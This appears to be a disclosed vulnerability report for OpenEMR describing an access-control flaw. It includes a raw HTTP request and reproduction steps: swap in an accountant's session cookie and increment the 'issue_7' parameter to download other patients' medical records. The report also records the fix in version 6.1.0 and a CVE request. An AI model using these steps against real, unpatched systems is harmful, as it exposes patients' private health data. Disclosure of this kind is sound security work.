Accounting User Can Download Patient Reports in openemr in openemr/openemr
Mar 11th 2022
Insecure Direct Object Reference
Non-privilege users (accounting & front-office) can download patient reports containing medical reports and documents by sending a request to a vulnerable end-point. There is no Access Control enforced, therefore, any authenticated user of OpenEMR can download patient records by just tampering the “Issue_7” parameter to any valid number. By incrementing this value, an unauthorized user can download patient records.
Implement ACL check to ensure that only authorized users of OpenEMR system are able to download patient documents from the vulnerable end-point.
Aden Yap Chuen Zhen (email@example.com)
Login to OpenEMR as Admin and capture the POST request to the following end-point:
In Burp, the HTTP POST request, cookie “OpenEMR” & parameter “issue_7” can be tampered.
Host: 192.168.0.141 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 155 Origin: http://192.168.0.141 Connection: close Referer: http://192.168.0.141/openemr/interface/patient_file/report/patient_report.php Cookie: OpenEMR=E6toaL3R-180fA2-MIw80a-G7PJPCapZxrTYIzY%2Cofj5CXEG Upgrade-Insecure-Requests: 1 include_demographics=demographics&include_billing=billing&pdf=1&issue_8=%2F&issue_10=%2F&issue_7=%2F14%2F&issue_6=%2F&issue_9=%2F&issue_11=%2F&issue_12=%2F
Replace the “OpenEMR” Cookie with Accountant Cookie and increment the “issue_7” parameter to any valid number eg “issue_7=/15/” to access patient documents.
This has been fixed in master and rel-610 branches and will be in OpenEMR's next production release (6.1.0).
OpenEMR 6.1.0 was released, today which fixes this issue.
Hi, Kindly issue a CVE for this vulnerability. Tq
Dear @admin i've already ping the maintainer, could you please follow up on the CVE creation? Tq
Dear @maintainer, could you kindly confirm that CVE can be created for this report? Tq
Hi, I consent to creation of CVE.